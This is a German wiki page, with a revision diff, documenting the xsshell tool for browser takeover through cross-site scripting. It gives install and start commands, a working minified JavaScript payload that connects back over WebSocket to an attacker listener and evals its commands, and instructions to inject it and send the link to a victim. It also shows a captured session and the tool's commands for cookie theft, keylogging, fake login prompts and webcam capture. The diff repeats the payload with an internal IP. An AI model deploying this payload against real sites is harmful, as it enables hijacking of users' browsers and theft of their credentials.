Aktuelle Version vom 28. Juli 2021, 13:08 Uhr

git clone

sudo apt-get install go
go get github.com/raz-varren/xsshell
go install github.com/raz-varren/xsshell

start

./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell:

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

Payload muss ins Eingabefeld
Generierter Link wird zum Opfer geschickt

JS Script Payload :

<script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://127.0.0.1:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

Die Shell

   start socket: 1, header: AqHFTtA
   socket connected: 1
   user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 
   page url:   http://127.0.0.1/xss.php?msg=?
   referrer:   http://127.0.0.1/xss.php?msg=?
   cookies:

xsshell

listening for sockets on :port, at url path: /s
starting console
type \? to list available commands

xsshell > \?
xsshell > \help \? \h: list available commands
xsshell > \alert: send an alert message to the target set usage: \alert ALERT_MESSAGE
xsshell > \cs: get the current cookies from the target set's current page and any cookie updates.
xsshell > \ct: crash the target set's tab
xsshell > \emd: return a list of media devices accessible to the target set's browser
xsshell > \ex: print out the client exploit javascript
xsshell > \exm: print out the minified version of the client exploit javascript
xsshell > \gi: download all images on the target set's page.

xsshell > \kl: start a keylogger on the target set
xsshell > \ll: list out any links found on the target set's currently open page
xsshell > \pfl: open a modal on the target set's page prompting them for a username and password
xsshell > \ps: print out socket info for all actively connected websockets
xsshell > \q: exit this program
xsshell > \sf: send a javascript file to the target set and execute it.

xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file
xsshell > \src: get the target set's currently rendered page source
xsshell > \st: set the websockets to target. one or more targets can be set with the following methods:

        * xsshell >              8        -target a single websocket connection belonging to that id number
        * xsshell >              1,2,8,10 -targets all websocket IDs in the comma separated list

xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available. images will be stored in DOWNLOAD_DIR.

xsshell > \xhr: send an xhr request from the target set's current page

        * xsshell >                  usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]

Links

https://github.com/raz-varren/xsshell

@@ Zeile 34: / Zeile 34: @@
-JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>
+JS Script Payload :
+ <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://127.0.0.1:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>
 =Die Shell=
-====== start socket: 1, header: AqHFTtA= ======
+    start socket: 1, header: AqHFTtA
-socket connected: 1
+    socket connected: 1
      user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
-     page url:   http://127.0.0.1/xss.php?msg=%3Cscript%3E%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22ws%3A%2F%2F10.82.70.52%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3C%2Fscript%3E&submit=klick
+     page url:   http://127.0.0.1/xss.php?msg=?
-     referrer:   http://127.0.0.1/xss.php?msg=%3Cscript%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22http%3A%2F%2F10.82.70.59%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3E%3C%2Fscript%3E&submit=klick
+     referrer:   http://127.0.0.1/xss.php?msg=?
      cookies:
-======   end socket: 1, header: AqHFTtA= ======
-=Auf dem Client=
+====== xsshell ======
+* listening for sockets on :port, at url path: /s
+* starting console
+* type \? to list available commands
-[[Datei:Xss-poc-js-sh1.png]]
+* xsshell > \?
+* xsshell > \help \? \h: list available commands
+* xsshell > \alert:      send an alert message to the target set  usage: \alert ALERT_MESSAGE
+* xsshell > \cs:         get the current cookies from the target set's current page and any cookie updates.
+* xsshell > \ct:         crash the target set's tab
+* xsshell > \emd:        return a list of media devices accessible to the target set's browser
+* xsshell > \ex:         print out the client exploit javascript
+* xsshell > \exm:        print out the minified version of the client exploit javascript
+* xsshell > \gi:         download all images on the target set's page.
+* xsshell > \kl:         start a keylogger on the target set
+* xsshell > \ll:         list out any links found on the target set's currently open page
+* xsshell > \pfl:        open a modal on the target set's page prompting them for a username and password
+* xsshell > \ps:         print out socket info for all actively connected websockets
+* xsshell > \q:          exit this program
+* xsshell > \sf:         send a javascript file to the target set and execute it.
+* xsshell > \sfl:        resend the last file that was sent using \sf, includes any new changes to the file
+* xsshell > \src:        get the target set's currently rendered page source
+* xsshell > \st:         set the websockets to target. one or more targets can be set with the following methods:
+         * xsshell >              8        -target a single websocket connection belonging to that id number
+         * xsshell >              1,2,8,10 -targets all websocket IDs in the comma separated list
+* xsshell > \wcs:        attempt to take a snapshot from the target set's webcam, if one is available. images will be stored in DOWNLOAD_DIR.
+* xsshell > \xhr:        send an xhr request from the target set's current page
+         * xsshell >                  usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]
 =Links=
-*https://github.com/shelld3v/JSshell/blob/master/README.md
+*https://github.com/raz-varren/xsshell

Xsshell: Unterschied zwischen den Versionen

Aktuelle Version vom 28. Juli 2021, 13:08 Uhr

Inhaltsverzeichnis

git clone

start

Payload

Die Shell

xsshell

Links

Navigationsmenü

Suche